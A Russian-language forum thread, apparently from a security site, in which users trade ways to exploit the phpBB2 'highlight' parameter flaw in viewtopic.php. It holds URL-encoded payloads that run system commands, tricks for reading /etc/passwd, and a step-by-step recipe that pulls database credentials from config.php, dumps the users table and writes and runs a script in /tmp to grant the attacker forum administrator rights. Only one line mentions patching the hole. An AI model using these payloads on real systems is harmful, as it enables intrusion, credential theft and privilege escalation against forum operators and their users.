Кста, тут мысль появилась, как дефейс замумить... Строчку перенаправть в файл, а его переименовать, например, в faq.php (или index.php)

Зацените прикол:
http://127.0.0.1/phpBB2/viewtopic.php?t=3&highlight=%2527%25 2esystem(chr(100)%252echr(105)%252echr(114))%252e%2527

а как внести даные в базу, например установить пользователю уровень 1 (т.е. права админа)

Получить хеш админа (в смысле, /etc/passwd файлик) можно вполне. Просто надо вместо пробела команде cat табуляцию писать. Вот так: cat%09/etc/passwd.
Закрывается очень просто - в viewtopic.php комментируешь кусок кода, который обрабатывает HTTP_GET_VARS['highlight']

1. тоже самое , не обязательно пробел заменять
ls=id;uname%20-a;cat%20/../../../../../../../etc/passwd
результат тот же.
2. Как быть если пароли спрятаны в shadow ? . К сожелению он не отображаеца...
в passwd вписаны только логины

А чем в запросе надо заменять символы '<' и '>' ?

хоть работающий пример sql запроса выложите, а там уже разберёмся

блин, какие проблемы?
разжОвываю для особо ленивых:
1) регишься на форуме
2) cat'аешь config.php на предмет данных для доступа к базе
3) делаешь дамп: mysqldump%20-uusername%20-ppassword%20dbname%20phpbb_users
ищешь ID своего юзера
4) создаешь файл
...&highlight=%2527.$poster=%60$file%60.%2527.&file=echo%20m ysql%20-uusername%20-ppassword%20-Ddbname%20-e%20'update%20p hpbb_users%20set%20user_level=1%20where%20user_id=YOU_USER_I­ D'%20%3E%20/tmp/.teeemp
5) чмод +x на файл
6) /bin/sh -c /tmp/.teeemp
вуаля и ты уже администратор форума. можешь логиниться и рулить.

в общем pg_dump (PostgreSQL)
как я понял там нельзя ввести пароль, т.к. отдельной стракой нужно вводить пароль, уф...  [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG] и даже wget не работает [IMG]http://www.securitylab.ru/forum/smileys/smiley11.gif[/IMG] может ктонить уже сталкивался с pg_dump ? всего то нужно установить user_level=1